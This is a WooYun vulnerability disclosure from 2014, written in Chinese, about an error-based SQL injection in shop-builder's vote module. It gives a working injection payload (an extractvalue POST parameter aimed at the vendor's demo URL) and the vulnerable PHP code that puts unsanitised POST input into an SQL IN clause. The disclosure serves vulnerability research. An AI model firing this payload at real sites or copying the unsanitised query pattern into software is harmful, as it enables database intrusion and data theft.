shop-builder报错注入1 | wooyun-2014-061113

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2014-061113

漏洞标题：

shop-builder报错注入1

漏洞详情

披露状态：

2014-05-20：积极联系厂商并且等待厂商认领中，细节不对外公开
2014-08-18：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

shop-builder设计不当存在SQL注入漏洞

详细说明：

官方演示程序：
http://cn.shop-builder.cn/
注入exp：
http://cn.shop-builder.cn/main.php?m=vote&s=vote
Post:type=special&vote[]=123) and extractvalue(rand(),concat(0x7e,version()))-- &cid=123
ShoplBuilder_v5.6\module\vote\vote.php
官网测试：

代码：

<?php #echo 123;exit;
include_once("includes/global.php");
//=====================================
$_GET['id']*=1;
if($_POST['type']=="special")
{	#var_dump($_POST['vote']);exit;
	$votes=implode(',',$_POST['vote']); #print_r($votes);exit;
	$url=$votes."&t=sp&cid=$_POST[cid]";
}
else
{
	if(!empty($_GET['id']))
	{
		$sql="select vote from ".NEWSD." where nid='$_GET[id]'";
		$db->query($sql);
		$votes=substr($db->fetchField('vote'),0,-1);
		$url=$_GET['id'];
	}
	elseif(!empty($_POST['vid']))
	{
		$votes=implode(',',$_POST['vid']);
		$url="&vid=$votes";
	}
	else
	{
		die("forbiden");
	}
}
if(!empty($votes))
{
	$sql="select * from ".NEWSVOTE." where id in ($votes)";	 #echo $sql;exit;
	#var_dump($db);exit;
	$db->query($sql);
	#echo $sql;
	$vote=$db->getRows();
...

WooYun.org

漏洞概要关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 kk_skipper@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 kk_skipper@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞